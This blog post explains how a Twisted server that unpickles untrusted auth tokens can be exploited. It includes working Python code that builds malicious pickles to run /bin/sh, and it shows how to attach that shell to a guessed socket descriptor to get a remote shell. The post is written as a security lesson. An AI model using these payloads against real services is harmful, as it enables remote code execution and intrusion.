If you program in Python, you’re probably familiar with the
pickle
serialization library, which provides for efficient
binary serialization and loading of Python datatypes. Hopefully,
you’re also familiar with the warning printed prominently near the
start of pickle
’s documentation:
Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
Recently, however, I stumbled upon a project that was accepting and unpacking untrusted pickles over the network, and a poll of some friends revealed that few of them were aware of just how easy it is to exploit a service that does this. As such, this blog post will describe exactly how trivial it is to exploit such a service, using a simplified version of the code I recently encountered as an example. Nothing in here is novel, but it’s interesting if you haven’t seen it.
The Target 🔗︎
The vulnerable code was a Twisted server that listened over SSL. The code looked roughly like the following:
class VulnerableProtocol(protocol.Protocol):
def dataReceived(self, data):
# Code to actually parse incoming data according to an
# internal state machine
# If we just finished receiving headers, call verifyAuth() to
check authentication
def verifyAuth(self, headers):
try:
token = cPickle.loads(base64.b64decode(headers['AuthToken']))
if not check_hmac(token['signature'], token['data'], getSecretKey()):
raise AuthenticationFailed
self.secure_data = token['data']
except:
raise AuthenticationFailed
So, if we just send a request that looks something like:
AuthToken: <pickle here>
The server will happily unpickle it.
Executing Code 🔗︎
So, what can we do with that? Well, pickle
is supposed to allow us
to represent arbitrary objects. An obvious target is Python’s
subprocess.Popen
objects – if we can trick the target
into instantiating one of those, they’ll be executing arbitrary
commands for us! To generate such a pickle, however, we can’t just
create a Popen
object and pickle it; For various mostly-obvious
reasons, that won’t work. We could read up on the “pickle” format and
construct a stream by hand, but it turns out there is no need to.
pickle
allows arbitrary objects to declare how they should be
pickled by defining a __reduce__
method, which should
return either a string or a tuple describing how to reconstruct this
object on unpacking. In the simplest form, that tuple should just
contain
- A callable (which must be either a class, or satisfy some other, odder, constraints), and
- A tuple of arguments to call that callable on.
pickle
will pickle each of these pieces separately, and then on
unpickling, will call the callable on the provided arguments to
construct the new object.
And so, we can construct a pickle that, when un-pickled, will execute
/bin/sh
, as follows:
import cPickle
import subprocess
import base64
class RunBinSh(object):
def __reduce__(self):
return (subprocess.Popen, (('/bin/sh',),))
print base64.b64encode(cPickle.dumps(RunBinSh()))
Getting a Remote Shell 🔗︎
At this point, we’ve basically won. We can run arbitrary shell commands on the target, and there are any number of ways we could bootstrap from here up to an interactive shell and whatever else we might want.
For completeness, I’ll explain what I did, since it’s a moderately
cute trick. subprocess.Popen
lets us select which file descriptors
to attach to stdin, stdout, and stderr for the new process by passing
integers for the stdin
and similarly-named arguments, so we can open
our /bin/sh
on arbitrarily-numbered fd’s.
However, as mentioned above, the target server uses Twisted, and it serves all requests in the same thread, using an asynchronous event-driven model. This means we can’t necessarily predict which file descriptor on the server will correspond to our socket, since it depends on how many other clients are connected.
It also means, however, that every time we connect to the server, we’ll open a new socket inside the same server process. So, let’s guess that the server has fewer than, say, 20 concurrent connections at the moment. If we connect to the server’s socket 20 times, that will open 20 new file descriptors in the server. Since they’ll get assigned sequentially, one of them will almost certainly be fd 20. Then, we can generate a pickle like so, and send it over:
import cPickle
import subprocess
import base64
class Exploit(object):
def __reduce__(self):
fd = 20
return (subprocess.Popen,
(('/bin/sh',), # args
0, # bufsize
None, # executable
fd, fd, fd # std{in,out,err}
))
print base64.b64encode(cPickle.dumps(Exploit()))
We’ll open a /bin/sh
on fd 20, which should be one of our 20
connections, and if all goes well, we’ll see a prompt printed to one
of those. We’ll send some junk on that fd until we manage to get the
original server to error out and close the connection, and we’ll be
left talking to /bin/sh
over a socket. Game over.
In Conclusion 🔗︎
Again, nothing here should be novel, nor would I expect any of these
pieces to take a competent hacker more than few minutes to figure out,
given the problem. But if this blog post teaches someone not to use
pickle
on untrusted data, then it will be worth it.